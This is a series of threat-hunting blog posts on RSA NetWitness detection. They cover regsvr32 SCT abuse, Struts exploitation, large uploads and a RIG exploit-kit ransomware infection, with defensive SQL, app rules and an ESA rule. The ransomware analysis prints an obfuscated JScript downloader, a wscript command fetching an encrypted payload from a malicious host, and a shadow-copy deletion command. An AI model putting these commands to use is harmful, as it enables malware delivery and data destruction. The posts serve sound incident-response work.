Here we can see that Outlook starts up Chrome to open a file in the Outlook Temporary Internet Files directory.  From there, we see regsvr32.exe kicked off with a URL in its launch arguments.  The regsvr32.exe binary is a legitimate, signed Microsoft file used to register DLLs and other controls in the Windows Registry.  Last year, researcher Casey Smith described how this component could take a URL to a remote file as an argument to bypass various security controls.  The URL could be over HTTP or HTTPS and would point to an SCT file.  The SCT file is really just an XML file with instructions on what regsvr32.exe should do.

 

With the tracking data showing us step by step what occurred on the system, we can use these commands on a different system and attempt to recreate the infection.  

 

On my analysis system, I opened a command prompt and ran the command that started this off.

 

This URL took us to the malicious script on a Google API site over SSL.  The contents of that SCT file can be seen below:

 

 

In there, we see the syntax the JSRat is going to execute, leveraging mshta as well as another URL.  This new 'terra' URL sends another XML scriptlet to download and install a malicious DLL called 'rubyonrais.dll'.

 

 

 

Tracking data in our analysis system looks very similar to what our original host showed along with the registering of the DLL.

 

 

If we take a look at the network traffic associated with this, we can get insight into what was happening as well.  

 

 

We can see the request to 'storage.googleapis.com' over SSL and then the connection to 'meubackup.terra[.]com[.]br', which downloaded a 1.4 MB file based on the network traffic.  Even though this is an SSL connection, we can still see the meta data about that session.  I can now go and find the file where the script told us it would be: in the C:\Users\Public\Administrator folder.

 

 

Currently this could be picked up with the IIOC "Runs mshta with javascript arguments".

 

Another IIOC we could create is slightly different from one out of the box, to cover both HTTP and HTTPS connections.

 

Regsvr32_runs_with_HTTP_argument

--Runs_REGSVR32_HTTP.sql Runs REGSVR32.EXE with HTTP argument 

/* DB Query

 

SELECT mn.MachineName, se.EventUTCTime, sfn.Filename, se.FileName_Target, se.Path_Target, se.LaunchArguments_Target, sla.LaunchArguments

 

FROM

[dbo].[WinTrackingEvents_P0] AS [se] WITH(NOLOCK) -- Also try P1
INNER JOIN [dbo].[MachineModulePaths] AS [mp] WITH(NOLOCK) ON ([mp].[PK_MachineModulePaths] = [se].[FK_MachineModulePaths])
INNER JOIN [dbo].[FileNames] AS [sfn] WITH(NOLOCK) ON ([sfn].[PK_FileNames] = [mp].[FK_FileNames])
INNER JOIN [dbo].[machines] AS [mn] WITH(NOLOCK) ON [mn].[PK_Machines] = [se].[FK_Machines]
INNER JOIN [dbo].[LaunchArguments] AS [sla] WITH(NOLOCK) ON [sla].[PK_LaunchArguments] = [se].[FK_LaunchArguments__SourceCommandLine]

 

WHERE

[se].[BehaviorProcessCreateProcess] = 1 AND
[se].FileName_Target = N'regsvr32.exe' AND
[se].LaunchArguments_Target LIKE N'%/i:http%'

 

--ORDER BY se.EventUTCTime desc
ORDER BY mn.MachineName desc
*/

 

-- IIOC

SELECT DISTINCT

[se].[FK_Machines],
[se].[FK_MachineModulePaths]
--,[se].[PK_WinTrackingEvents] AS [FK_mocSentinelEvents]  

-- If you are using 4.3.0.4, remove the comment dash above


FROM

[dbo].[WinTrackingEventsCache] AS [se] WITH(NOLOCK)

 

WHERE

[se].[BehaviorProcessCreateProcess] = 1 AND
[se].FileName_Target = N'regsvr32.exe' AND
[se].LaunchArguments_Target LIKE N'%/i:http%'

 

OPTION (RECOMPILE);

 

 

I hope you find this useful and as always, happy hunting.

 

Chris

If you have been using RSA NetWitness Packets for any length of time, you might have noticed that many large sessions max out at approximately 32MB.  Furthermore, there may be multiple 32MB sessions between the same two hosts.

 

 

Beginning in 10.5, a new meta key called 'session.split' was added to track related follow-on sessions.  While the decoder settings may draw the line at 32MB for a session (the default setting, which I don't recommend changing), network traffic is not bound by such restraints; it can be as large as it has to be.  All of this traffic is still captured, but there wasn't anything really tying the sessions together.  With session.split, however, we can see that there is more network data to be found.  In the 'List View' screenshot above, you can see the numbers on the far right of the session.  You can right-click on that number and find the session fragments in a new tab.

 

If that view doesn't work for you, you can build your own custom view like the one below.

 

 

Recently, I was discussing with some colleagues how to find outbound uploads greater than 1 GB in size, to identify some potential exfiltration use cases.  One thing that came to mind was using the meta in 'session.split'.  In a few short minutes, I had an application rule built using some of the content from the Hunting Pack (RSA Announces the Availability of the Hunting Pack in Live).  Let's break it down.

 

First, we know that it would be outbound network traffic.  Therefore, we could start our application rule with:

 

(medium = 1 && direction = 'outbound')

 

If you don't have directionality setup in your decoders, you could substitute "direction = 'outbound'" with "org.dst exists".

 

Next, we look at the new meta key from the hunting pack called 'analysis.session' (aka Session Characteristics).  The purpose of this meta key is to tell the analyst things that were observed about the network session.  In our case, we are looking for 'ratio high transmitted'.

 

The meta 'ratio high transmitted' refers to a calculation comparing the transmitted bytes (requestpayload) to the received bytes (responsepayload) in a network session.  It provides a ratio score of 0 - 100 showing which side sent more data: a score of 0 means more bytes were received than transmitted, while a score of 100 means more bytes were transmitted than received.  Since we are looking for uploads, which typically transmit more data than they receive, we can add this meta to our app rule.

 

(medium = 1 && direction = 'outbound' && analysis.session = 'ratio high transmitted')

 

However, we aren't done yet.  How do we tell if it is around or over 1 GB?  This is where session.split comes in.  Since sessions are capped at 32MB by the default decoder configuration, we can do some math to find out how many sessions it would take to reach approximately 1 GB.

 

1024 MB / 32 MB = 32 sessions.

 

Since there could be retransmitted data or other anomalies in the traffic, let's give ourselves an approximate session count of 30.  This means that if session.split reaches 30 splits (really 31, since it starts from 0), we have a large session and may want to have a closer look.

 

Therefore, our application rule looks like:

 

(medium = 1 && direction = 'outbound' && analysis.session = 'ratio high transmitted' && session.split >= 30)

 

 

I called mine 'large_outbound_transmit', but you can call it whatever you like.  This will tag any of those follow-on sessions that match the criteria we set in the app rule, starting at session.split 30.  To find all the session fragments, go back into the Investigation Events view and select the List view.  Right-click on the session.split number (not the little icon to the left of it) and select 'Refocus' or 'Refocus New Tab'.

 

 

 

What's nice about this rule is that it works whether the content is encrypted or unencrypted; it is simply working against meta we've already collected.  Now I can tell if I have large network sessions leaving my network.  If you regularly have large sessions, creating a filtering application rule or feed may help reduce some of that noise.

 

More information about session.split and understanding its configuration can be found here: Investigation: Combine Events from Split Sessions 

 

I hope you found this post helpful, and as always, happy hunting.

 

Chris

UPDATE - March 21, 2017 

Due to continued interest in this event and continued public exploitation, we've added detection to the HTTP_lua parser.  Customers will get this update automatically via the Live update process if they are subscribed to this content.  The following meta is created when the parser triggers:

 

ioc="apache struts exploit attempt"

analysis.service="content-disposition filename contains null character"

 

Thanks!  

 

 

Since the release of CVE-2017-5638, the RSA Incident Response team has fielded several questions about how to detect this activity.  Proof-of-concept code is already available and being used to identify vulnerable servers.  Fortunately, detection with NetWitness Packets is quite easy.

 

The packet decoder contains HTTP parsers that will parse out much of the HTTP headers.  Since this exploit appears to be using a malformed Content-Type entry, we can detect this by examining meta already coming in.

 

One thing to note is that this traffic still appears to be valid HTTP traffic.  It looks like a typical POST and has valid HTTP headers, with the exception of the malformed Content-Type.

 

 

Another included an HTTP GET.

 

 

One way to find this traffic is by combining existing meta to make new meta.  We can make an app rule out of this.  Let's examine the meta.

 

 

We already have a service type of 80 (HTTP) and a long content meta value.  We can pick out interesting pieces from the content meta key, such as "_member".

 

Therefore, an application rule might look like:

 

service=80 && content contains '_member'

 

If we turn that into a query to double-check our work, we should get the session(s) of interest:

 

 

 

I've attached a sample PCAP of the POST if you need to replay it.  Another example, showing an HTTP GET, was found on the SANS Internet Storm Center site here:  Critical Apache Struts 2 Vulnerability (Patch Now!) - SANS Internet Storm Center

 

Happy Hunting,

 

Chris

This came out of a separate discussion but I thought it could be helpful for others.

 

A customer was looking to write an ESA rule that essentially performed an 'ends' match against alias.host meta.  For example, 'bad.maliciousdomain.com' or 'really.bad.maliciousdomain.com' could both be matched by 'maliciousdomain.com'.  Things like this can actually be done on the decoder and created as meta for easy searching.

 

You could create application rules on your decoders that specifically look for the domain of interest.

 

name=maliciousdomain rule="alias.host ends 'maliciousdomain.com'" alert=alert type=application

 

Then, just have ESA look for alert = 'maliciousdomain', since it will already be meta at that point.

 

You could also extract the root host for any and all sessions where alias.host is populated.  I wrote a parser to help with that, the purpose being that if I wanted to exclude any domain, I could.  It uses a custom meta key called 'root.host', so an index change on the concentrators would be needed if you want to query against it.  If you want to change the meta key, feel free to do so.

 

 

The parser works by performing a meta callback against 'alias.host' and then examining the location of all the dots in the hostname.  It compares the last label against the TLDs listed in a table and then moves to the left if a match is found.
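The core of that logic looks roughly like the sketch below. Parser boilerplate (createParser, setKeys, setCallbacks) is omitted, the TLD table is deliberately tiny and illustrative, and multi-part TLDs such as 'co.uk' would need the extra move-left step described above.

-- Illustrative: reduce 'really.bad.maliciousdomain.com' to 'maliciousdomain.com'
local tlds = { ["com"] = true, ["net"] = true, ["org"] = true, ["uk"] = true }

function root_host:onHost(index, host)
   if host then
      local labels = {}
      for label in string.gmatch(host, "[^%.]+") do
         table.insert(labels, label)
      end
      if #labels >= 2 and tlds[labels[#labels]] then
         -- registered domain = the label left of the TLD, plus the TLD itself
         nw.createMeta(self.keys["root.host"], labels[#labels - 1] .. "." .. labels[#labels])
      end
   end
end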

 

Since this is just performing a meta callback, it can work on both packet and log decoders.  Just remember that on log decoders, you would need to add the nwll.lua file; you can download it from Live and deploy it manually.

 

Happy hunting.

 

Chris

The RSA Netwitness Suite has a lot of data flowing into it.  However, it does not take in everything.  Context, which is necessary to properly maintain situational awareness, can come from other sources and can help analysts find answers to the questions they have.  One such source is Shodan.

 

Shodan is a search engine that can be used to find information about computers and other devices that are connected to the Internet.  From web servers to web cameras...routers to refrigerators.  Shodan has a wealth of information about those IP addresses and hostnames and that information can be queried with an authorized account.  This could tell you public information about your own organizations systems and address space that you were not aware of previously.

 

To make the search a little easier, you could take IP's and hostnames found in the RSA Netwitness Suite and pivot into a Shodan search for them.

 

I created a couple of right-click plugins that could be used on the RSA Netwitness server in the Investigations module.  They can be created in the following way:

 

Go to your server with an administrator account and go to Administration, System and click on the Context Menu Actions.  Then, click on the ( + ) plus icon.

 

 

Then, copy and paste the text from the plugin file into the Context Menu Configuration editor box.  Since there is one plugin for IP addresses and another for hostnames, you would perform this task twice.
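For reference, the IP address version of the plugin is structured like the sketch below, modeled on the URLContextAction format used by other external lookups.  Treat the field values as illustrative and use the attached plugin files as the source of truth:

{
    "displayName": "Shodan IP Lookup",
    "cssClasses": ["ip-src", "ip-dst", "ip.src", "ip.dst"],
    "description": "Look up an IP address in Shodan",
    "type": "UAP.common.contextmenu.actions.URLContextAction",
    "version": "Custom",
    "modules": ["investigation"],
    "local": "false",
    "groupName": "externalLookupGroup",
    "urlFormat": "https://www.shodan.io/host/{0}",
    "openInNewTab": "true",
    "id": "ShodanIPLookup"
}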

 

 

When finished, click ( OK ).  This will save the plugin.

 

You should now see two new plugins in your list.

 

 

You will likely have to close or refresh the Investigator browser tab and reopen it.  Then, right click on either the IP address or alias.host meta and you should see the option for an External Lookup into Shodan.

 

 

 

Hopefully, this provides you with a bit more knowledge and understanding about the data you see every day.

 

Good luck and happy hunting.

 

Chris

*** Warning the sites referenced contain live exploit kits and malware. As always please exercise proper caution when working with live malware. ***

 

Ransomware elevated itself into a clear and present threat for organizations in 2016, and unfortunately this threat is likely to continue into 2017 and beyond.  As businesses and vendors work at combating these and other threats, it is important to understand what is happening on both the network and the endpoints so that we can all properly recognize and respond when such an incident occurs.  This post is an attempt to reveal what incident responders may see in the course of defending the business.  It intends to show what a single drive-by attack may look like from both the network and host points of view.

 

First, the architecture.  This is a lab environment running RSA NetWitness Suite 10.6.1.  A Packet Decoder is monitoring the internet ingress and egress points from a mirror port on a managed switch; this is mainly outbound client activity.  The Event Stream Analytics (ESA) appliance is also available.  There is no web proxy in this environment.  The workstation that gets compromised is a Windows 7 VM running IE 8 and Flash 14; these are obviously old versions, but useful for exploitation.  The RSA NetWitness Endpoint (ECAT) 4.2.0.2 agent is installed and set to Full User-Mode Monitoring.

 

 

Next, we need some malicious code.  For that, I looked at the fantastic malware and packet captures at Malware-Traffic-Analysis.Net.  There is some amazing work being done here and is an excellent reference point to compare what was observed in network traffic as well as what happens on the host.  Specifically, I was looking at this:

 

2016-11-21 - RIG EK DATA Dump (http://malware-traffic-analysis.net/2016/11/21/index2.html)

 

Rather than uploading a PCAP or infecting the host with the malware sample, I had the system visit the same compromised website as referenced in the post.

 

 

In a few moments, I can see the ransom note appear on my victim PC's desktop.

 

 

As if that wasn't enough, the malware was kind enough to change my desktop to include the ransom note as well.

 

This is all well and good, and you would certainly be aware you have a problem, but what was captured on the wire and on the host?  Let's start with the network traffic.

 

 

The first thing we see is an HTTP GET to the compromised site.  

 

 

We can see it is likely a WordPress site and that it had gzip content encoding.  If we scroll a little further down in the session, we can see a suspicious-looking iframe that appears to have been injected into the page.

 

 

In step 2, we can see the DNS lookup and HTTP GET to 'red[.]mobilaile[.]com', which hosts malicious content.  If we look closer at the 'rxbytes' meta, we can see that the victim PC received 56,810 bytes of data.  When we have a closer look at that session, we can see the delivery of a suspicious script...

 

and then a suspicious Adobe Flash file.

 

This winds up being the exploit payload that compromises the host.  The content type of "application/x-shockwave-flash" may be something we can use in the future.

 

Once exploited, this brings us to step 3 in this attack: the delivery of the threat actor's payload.  Also notice the 'rxbytes' of 254,598 bytes.

 

 

Also important is the content-type of "application/x-msdownload".  You will notice that there doesn't appear to be an MZ file header in this session.  That is because this malicious binary is RC4-encrypted and will be decrypted on the host just in time to do its real work.

 

Lastly, we see several UDP attempts to some IP ranges on port 6892.

 

This essentially concludes the network activity of this malicious code.  Let's look at what happened on the endpoint itself.

 

 

First, we see the Internet Explorer process (iexplore.exe) create a process for cmd.exe.  The Target Command Line shows us it is executing an 'echo' followed by what looks to be a loop.

 

 

CMD command
cmd.exe /q /c cd /d "%tmp%" && echo function O(n,g){for(var c=0,s=String,d,D="pu"+"sh",b=[],i=[],r=(/**/255),a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g.length)^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,S="fromC"+"harCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};function H(g){var T=u(0),d=W(T+"."+T+u(1));d./**/setProxy(n);d.open(u(2),g(1),n);d.Option(0)=g(2);d["\x53en\x64"];if(200==d.status)return…

 

 

Next, we see the Windows Scripting Host (wscript.exe) writing to an executable named 'rad9612F.tmp.exe' as it executes a script.  Furthermore, it was retrieving the file from 'red[.]mobilaile[.]com', which we saw in step 3 of the network section.  The file was RC4-encrypted; the script below uses the key "gexywoaxor" to decrypt the file on the host.

 

wscript command
wscript  //B //E:JScript MXj6sFosp "gexywoaxor" "hXXp://red[.]mobilaile[.]com/?q=w3jQMvXcJxbQFYbGMvvDSKNbNkzWHViPxo-G9MildZuqZGX_k7DDfF-qoV3cCgWR&sourceid=msie&aqs=msie.103j68.406n6u8&oq=xfotJbpWbAXj2UKGewJind9cBF5A8KCu3EjdmhGbhZ-Fq0SEaQpD96KWELALhR32&es_sm=116&ie=UTF-8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"

 

Next, we see cmd.exe creating the 'rad9612F.tmp.exe' process.  As it is doing this, the 'rad9612F.tmp.exe' process also writes to 'System.dll', located at "C:\Users\analyst\AppData\Local\Temp\nslC925.tmp\" on the endpoint.

 

 

This could be something of interest and we can ask RSA Netwitness Endpoint (ECAT) to retrieve that file for us so that we can conduct additional analysis.  We could even blacklist the file hash and then identify any other system that might have it.

 

 

In step 4, we can see that wscript is run again, this time creating the file 'rad29123.tmp.exe' and placing it in the "C:\Users\analyst\AppData\Local\Temp\" directory.

 

 

Step 5 is crucial, as now the 'rad29123.tmp.exe' module is calling cmd.exe to execute the Windows Management Instrumentation Command-line (wmic).  It does this so that it can run 'wmic.exe shadowcopy delete', which deletes any volume shadow copies on the host to prevent the victim from being able to restore files.

 

 

At this point, the system is compromised and data is lost.  Step 6 shows the calling of the mshta.exe process to launch the ransom note, and step 7 shows the processes being stopped with the taskkill command.  Eventually, 'rad9612F.tmp.exe' deletes itself.

 

There were several Instant Indicators of Compromise (IIOCs) that were part of this activity and could be useful for future investigations.

 

One thing about ransomware is that it is noisy; there isn't much that is stealthy about it.  It wants you to know you have been compromised so that you will pay the ransom to get the decryption tool and recover your data.  This activity can be detected with network and endpoint indicators.  ESA can also help, as we can string different network indicators together across multiple sessions.

 

 

One custom ESA rule to help detect possible flash exploitation is as follows:

 

flash_to_download

module Module_flashdown_20161109093400;



@Name('Module_flashdown_20161109093400_Alert')
@Description('flash_to_download')
@RSAAlert(oneInSeconds=0)

SELECT * FROM Event(
/* Statement: find_flash */
(isOneOfIgnoreCase(content,{ 'application/x-shockwave-flash' }))
OR
/* Statement: find_download */
(isOneOfIgnoreCase(content,{ 'application/x-msdownload' }))

).win:time(15 seconds)
MATCH_RECOGNIZE (
PARTITION BY ip_src
MEASURES E1 as e1_data , E2 as e2_data
PATTERN (E1 E2)
DEFINE
E1 as (isOneOfIgnoreCase(E1.content,{ 'application/x-shockwave-flash' })),
E2 as (isOneOfIgnoreCase(E2.content,{ 'application/x-msdownload' }))
);

 

This rule looks for content-type 'application/x-shockwave-flash' followed by content-type 'application/x-msdownload' within 15 seconds from the same source IP.  If your environment is capturing in front of a web proxy, you may be able to partition by 'orig_ip', which would be the originating IP address, provided there is an X-Forwarded-For header.  If there is no X-Forwarded-For header available to you, contact your network and/or proxy administrators; just make sure the header gets removed before it leaves the perimeter firewalls.  This type of information is incredibly valuable to analysts.

 

This rule did require a change to how the 'content' meta key is recognized by ESA.  Normally, 'content' is listed as a string, meaning it would only have one value per session.  However, there can be multiple content-types in a network session.  Therefore, I needed to change this from a string to an array.  Doing so was relatively easy: I simply added the 'content' meta key as an array and restarted the ESA service.

 

 

To restart the ESA service, SSH to the appliance and issue 'service rsa-esa restart'.  Once restarted, 'content' was listed as an array.

 

That's all for now.  Good luck out there and happy hunting.
